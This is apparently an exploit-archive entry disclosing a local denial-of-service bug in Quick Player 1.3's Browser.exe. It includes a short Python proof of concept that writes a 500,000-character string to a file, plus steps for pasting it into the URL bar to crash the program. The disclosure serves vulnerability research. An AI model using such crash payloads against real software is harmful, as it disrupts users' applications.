Quick Player 1.3 Denial Of Service

2020.06.06
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Quick Player 1.3 - 'Browser.exe' Denial of Service # Date: 06/05/2020 # Author: Felipe Winsnes # Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html # Version: 1.3 # Tested on: Windows 7 # Proof of Concept: # 1.- Run the python script "poc.py", it will create a new file "poc.txt" # 2.- Open the application "Browser.exe" # 3.- Paste the contents of "poc.txt" within the url bar # 4.- Crashed # Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Quick-Player-Browser-dos/ # Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings7/2.gif buffer = "A" * 500000 f = open ("poc.txt", "w") f.write(buffer) f.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top